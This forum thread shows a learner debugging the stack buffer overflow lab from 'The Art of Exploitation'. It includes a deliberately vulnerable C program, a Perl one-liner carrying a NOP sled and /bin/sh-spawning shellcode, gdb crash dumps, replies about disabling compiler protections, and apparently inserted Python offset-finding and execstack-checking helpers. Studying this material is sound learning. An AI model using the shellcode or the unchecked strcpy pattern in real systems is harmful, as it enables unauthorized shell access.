
Buffer Overflows and Nop Sled


digitalvampire

Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Fri Jan 04, 2013 3:59 pm

Buffer Overflows and Nop Sled

Hey Guys,
(Not sure if this is a double post, I sent one in a few mins ago but it didn't seem to take)

I've been playing around with Buffer Overflows this week, and I seem to be running into a strange issue.  I am going to try my best to explain it.

I've been working with the examples in "The Art of Exploitation" The first one is vuln.c and here is the code:

  Code:
#include <string.h>   /* for strcpy() */

int main(int argc, char *argv[])
{
    char buffer[500];
    /* No length check: an argument longer than 500 bytes runs past the
       buffer into the saved frame pointer and return address. This is the
       book's intended bug, left in place deliberately. */
    strcpy(buffer, argv[1]);
    return 0;
}



I compiled the program with -fno-stack-protector and -mpreferred-stack-boundary=2, and I've also made sure ASLR is off (running Ubuntu 12.10 in a VM).

I've been calculating my return address by subtracting about 400 from the ESP value after the buffer has been added onto the stack.  I figured this is where the nop sled should be.  I have actually gotten it to the point where it will segfault and print out the address that I was throwing at it, but I guess I'm curious why, if EIP has that address, it's not launching the sled and sliding down to my shellcode.  I'm aware of the divisible-by-4 rule, and I'm pretty sure I have that in place too.

Here is the GDB session with the info I'm throwing at it:

  Code:
Starting program: /root/aeh/bof/vulnerableapp `perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

Breakpoint 1, main (argc=2, argv=0xbffff604) at vul.c:8
8               strcpy(buffer, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff18a in ?? ()



Any ideas on how to attack this next?  I'd really like to learn this, it's rather exciting :)

Thanks in advance for all your help!

Sincerely,

-DV
Last edited by digitalvampire on Fri Jan 04, 2013 4:37 pm, edited 1 time in total.

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Fri Jan 04, 2013 5:55 pm

Re: Buffer Overflows and Nop Sled

I'd try to find out what your exact offset is through a cyclic pattern (i.e. pattern_create.rb) or a binary tree analysis. I wouldn't just ballpark approximate values.

What address are you submitting to EIP? It should be something like a jmp esp address, not an address somewhere in your NOP sled.

It's kind of difficult to troubleshoot your issue without the register values, stack contents, full exploit, etc.
The day you stop learning is the day you start becoming obsolete.
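The offset-finding step dynamik recommends, as an added example rather than anything from the thread: a pattern_create-style generator, the matching offset lookup for the value gdb prints in EIP, and a constructed model of vuln.c's frame (buffer[500] followed directly by the saved EBP and return address, an assumption to confirm in gdb) so the round trip can be run without the binary.

```python
import string
import struct
from itertools import product


def cyclic_pattern(length: int) -> bytes:
    """pattern_create-style sequence (Aa0Aa1Aa2...): every 3-byte triplet is
    unique, so any 4 consecutive bytes pin down a single position."""
    out = bytearray()
    for up, low, dig in product(string.ascii_uppercase,
                                string.ascii_lowercase, string.digits):
        out += (up + low + dig).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset whose bytes ended up in EIP. gdb prints EIP as a little-endian
    32-bit number, so repack it to recover the byte order seen in memory."""
    needle = struct.pack("<I", eip)
    return pattern.find(needle)  # -1: EIP did not come from the pattern


def simulated_crash_eip(payload: bytes, ret_offset: int = 504) -> int:
    """Constructed model of vuln.c's frame: 500-byte buffer, 4-byte saved EBP,
    then the return address (assumes no compiler padding; verify in gdb)."""
    if len(payload) < ret_offset + 4:
        raise ValueError("payload too short to reach the return address")
    return struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0]


if __name__ == "__main__":
    pat = cyclic_pattern(600)        # comfortably longer than the buffer
    eip = simulated_crash_eip(pat)   # what gdb would show as "0x... in ?? ()"
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(pat, eip)}")
```

Feed the same pattern to the real binary as argv[1], read the EIP value from the SIGSEGV line, and pattern_offset() gives the exact distance to the return address instead of a ballpark figure.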

digitalvampire

Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Fri Jan 04, 2013 6:09 pm

Re: Buffer Overflows and Nop Sled

Thanks, that actually helps a lot!

Is there a way through gdb I can dump the full contents of the stack?

I've actually been trying to exploit it via command line for now using:

  Code:
`perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`


I was submitting this address for the EIP: 0xbffff18a

Except I submitted it via Little Endian style.

I thought if I pointed it to an address in the Nop Sled, it would slide down to the code?

Thanks again!! :)

*Edit:

After getting a whole bunch of strewn test files everywhere, I started clean, but still with the same issue.  Here is a dump of the EIP after the segfault.

  Code:
Program received signal SIGSEGV, Segmentation fault.
0xbffff4a4 in ?? ()
(gdb) x/20x $eip
0xbffff4a4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4b4:     0x31909090      0x01ec83c0      0x68240488      0x68736162
0xbffff4c4:     0x6e696268      0x01ec832f      0x2f2404c6      0x5650e689
0xbffff4d4:     0xf3890bb0      0xd231e189      0x01b080cd      0x80cddb31
0xbffff4e4:     0xbffff4a4      0xbffff4a4      0xbffff4a4      0xbffff4a4
(gdb)



The repeated return address entered was 0xbffff4a4, which looks almost successful, as the segfault is giving me that as its value for EIP.  Why is it stopping here?  I have ideas but they are somewhat mangled :)

Thanks!!
Last edited by digitalvampire on Fri Jan 04, 2013 8:19 pm, edited 1 time in total.

superkojiman


Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Sat Jan 05, 2013 10:43 pm

Re: Buffer Overflows and Nop Sled

I was able to exploit the example on Ubuntu 10.04, but only by compiling it with -z execstack. That is:

gcc -fno-stack-protector -mpreferred-stack-boundary=2 -ggdb -o vuln -z execstack vuln.c

The book comes with a live CD that should turn off (or not include) certain security features that would prevent the exploits from working. I would suggest using that while going through the exploit examples.

Some references that might be helpful if you do choose to use a more current Linux distribution:

https://www.soldierx.com/tutorials/Stac ... nux-System
http://paulmakowski.wordpress.com/2011/ ... k-in-2011/
OSCP + OSCE
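A quick way to confirm whether a binary was actually linked with -z execstack, as an added example that is not from the thread or the book: the linker records the stack permissions in the ELF PT_GNU_STACK program header, and PF_X set there means an executable stack. The minimal_elf32() helper builds a constructed header-only ELF (not a runnable binary) so the check can be exercised offline; point check_file() at your real vuln binary.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header that carries the stack permissions
PF_X = 0x1                  # executable bit in p_flags


def stack_is_executable(elf: bytes):
    """True if PT_GNU_STACK has PF_X, False if it lacks it, None if the
    header is absent (the loader's default then decides)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = elf[4] == 2                  # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if elf[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big endian
    if is64:
        (phoff,) = struct.unpack_from(end + "Q", elf, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 54)
    else:
        (phoff,) = struct.unpack_from(end + "I", elf, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 42)
    for i in range(phnum):
        base = phoff + i * phentsize
        (p_type,) = struct.unpack_from(end + "I", elf, base)
        # p_flags follows p_type in Elf64_Phdr but sits at +24 in Elf32_Phdr
        (p_flags,) = struct.unpack_from(end + "I", elf, base + (4 if is64 else 24))
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None


def check_file(path: str):
    with open(path, "rb") as f:
        return stack_is_executable(f.read())


def minimal_elf32(stack_flags: int, p_type: int = PT_GNU_STACK) -> bytes:
    """Constructed sample: 32-bit little-endian ELF header plus one program
    header, enough for the parser and nothing more."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                               2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", p_type, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    print("RWE stack:", stack_is_executable(minimal_elf32(0x7)))  # True
    print("RW  stack:", stack_is_executable(minimal_elf32(0x6)))  # False
```

readelf -l vuln | grep GNU_STACK shows the same flags; a result of False here means the shellcode on the stack will never execute regardless of how accurate the return address is.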

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sat Jan 05, 2013 11:51 pm

Re: Buffer Overflows and Nop Sled

+1 to just using the accompanying CD: http://nostarch.com/hackingCD.htm

That'll remove a lot of the weird variables that may unexpectedly crop up on more recent Linux distros (i.e. default GCC protections).

The book doesn't address them, so not going through it as intended will result in unnecessary headaches. Superkojiman provided good resources for further study.
The day you stop learning is the day you start becoming obsolete.

caissyd


Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Jan 07, 2013 8:11 am

Re: Buffer Overflows and Nop Sled

You can also take a look at some very good and free video tutorials from securitytube.net.

Buffer Overflow Exploitation Megaprimer for Linux: http://www.securitytube.net/groups?oper ... &groupId=4

Good luck!
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

digitalvampire

Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Mon Jan 07, 2013 11:13 am

Re: Buffer Overflows and Nop Sled

Thanks guys! :)  I too figured out that there was something weird going on, and switched to using DVL to compile, which seemed to work.  I did not know about that extra switch for gcc though; I'm going to try it on my Ubuntu machine.

I have the original book, 1st edition, which doesn't have the CD, but I think with that extra compile parameter it should work better, and if not I can keep compiling in DVL.

The SecurityTube videos are great. I went through those recently and always look forward to him adding more. I have been meaning to try the Python series when I get a chance. (I'm a Python fanatic.)

Thanks again guys!! :)

-DV

hayabusa


Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Jan 07, 2013 12:34 pm

Re: Buffer Overflows and Nop Sled

The Python series is great, too.  You'll enjoy it.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

superkojiman


Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jan 07, 2013 1:06 pm

Re: Buffer Overflows and Nop Sled

digitalvampire wrote: I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL.

The link ajohnson provided has a link that allows you to download the ISO in case the CD that came with the book is broken (or in your case, not included). Here's the direct link to the ISO: http://www.mininova.org/tor/2533556
OSCP + OSCE

digitalvampire

Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Tue Jan 08, 2013 5:51 am

Re: Buffer Overflows and Nop Sled

Thanks again! :)  I will definitely get that CD, especially since it was designed specifically for the exercises in the book.

Thanks!!

-DV
